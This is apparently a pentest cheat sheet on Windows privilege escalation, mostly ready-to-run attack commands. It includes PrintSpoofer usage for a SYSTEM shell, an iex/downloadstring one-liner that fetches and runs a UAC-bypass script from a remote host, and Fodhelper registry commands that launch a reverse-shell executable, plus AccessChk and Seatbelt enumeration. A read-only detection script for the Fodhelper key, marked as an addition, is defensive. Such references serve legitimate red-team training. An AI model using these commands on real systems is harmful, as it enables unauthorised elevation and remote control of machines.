# Privilege Escalation

### SeImpersonatePrivilege

[PrintSpoofer](https://github.com/itm4n/PrintSpoofer)

```
PrintSpoofer64.exe -i -c powershell
```

Run the above command to get an interactive PowerShell session with SYSTEM privileges.

**UAC**

* [UACBypass.ps1](https://gist.github.com/mattifestation/b4072a066574caccfa07fcf723952d54)

```
iex(new-object net.webclient).downloadstring('http://192.168.1.1/uacbypass.ps1');alt
```

* Fodhelper UAC Bypass

Use these commands in a PowerShell session:

```
New-Item "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force

New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force

Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell.exe -exec bypass -c C:\Windows\Tasks\reverse-shell.exe" -Force
```

Start a listener to catch the shell, then execute fodhelper.exe:

```
C:\Windows\System32\fodhelper.exe
```
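A defender-side check for the Fodhelper steps above, as an added example that is not part of the original page: it looks in every loaded user hive for the `ms-settings\shell\open\command` key those commands create and reports the UAC consent level. The function names `Get-MsSettingsHandlerOverride` and `Get-UacConsentLevel` are hypothetical; the script only reads the registry.

```powershell
# Added example (read-only): find per-user ms-settings handler overrides.
# Function names are hypothetical, not part of any tool named on this page.
$RelPath = 'Software\Classes\ms-settings\shell\open\command'

function Get-MsSettingsHandlerOverride {
    # Walk every loaded user hive; HKCU is only the current user's view.
    Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' } |
        ForEach-Object {
            $sid     = $_.PSChildName
            $keyPath = "Registry::HKEY_USERS\$sid\$RelPath"
            if (Test-Path -LiteralPath $keyPath) {
                $key = Get-Item -LiteralPath $keyPath
                [pscustomobject]@{
                    Sid                = $sid
                    DefaultCommand     = $key.GetValue('')   # the "(default)" value
                    HasDelegateExecute = $key.GetValueNames() -contains 'DelegateExecute'
                    Key                = $keyPath
                }
            }
        }
}

function Get-UacConsentLevel {
    # 2 = "Always notify": auto-elevating Windows binaries prompt as well.
    $policy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $value  = (Get-ItemProperty -Path $policy -Name ConsentPromptBehaviorAdmin `
                   -ErrorAction SilentlyContinue).ConsentPromptBehaviorAdmin
    [pscustomobject]@{
        ConsentPromptBehaviorAdmin = $value
        AlwaysNotify               = ($value -eq 2)
    }
}

$hits = @(Get-MsSettingsHandlerOverride)
if ($hits.Count -gt 0) {
    Write-Warning "ms-settings handler override present in $($hits.Count) user hive(s)"
    $hits | Format-List
} else {
    Write-Output 'No ms-settings handler override found in loaded user hives.'
}
Get-UacConsentLevel | Format-List
```

Run it from an elevated session so that hives of other logged-on users are readable; any hit with a `DefaultCommand` set deserves review.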

**AccessChk**

```
accesschk.exe "currentuser" C:\Windows -wus
accesschk.exe -ucqv servicename
```

**SeatBelt**

```
Seatbelt.exe -group=user
```
